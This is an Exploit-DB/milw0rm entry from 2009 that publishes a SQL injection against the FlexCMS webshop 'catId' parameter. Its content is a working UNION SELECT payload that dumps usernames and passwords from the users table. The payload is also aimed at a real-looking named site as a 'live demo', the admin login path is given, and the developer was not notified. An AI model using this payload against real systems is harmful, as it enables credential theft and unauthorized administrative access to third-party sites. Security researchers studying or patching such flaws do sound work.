FlexCMS catId Remote SQL Injection Vulnerability

2009-02-09T00:00:00
ID EDB-ID:8018
Type exploitdb
Reporter MisterRichard
Modified 2009-02-09T00:00:00

Description

FlexCMS (catId) Remote SQL Injection Vulnerability. CVE-2009-0534,CVE-2009-1256. Webapps exploit for php platform

                                        
                                            AUTHOR: MisterRichard

FlexCMS Remote SQL Injection

Discovered by MisterRichard.

Developer site: http://www.flexcms.dk/

Developer has not been notified.

Live demo:

Injection: www.target.com/flx/webshop/?catId=145%20union%20all%20select%201,2,3,concat(username,char(58),password)+from+users--

http://www.radikalungdom.dk/flx/webshop/?catId=145%20union%20all%20select%201,2,3,concat(username,char(58),password)+from+users--

Admin login site:

http://target.com/flexadmin/

Greetz, agonx, kollek, cardingnu

# milw0rm.com [2009-02-09]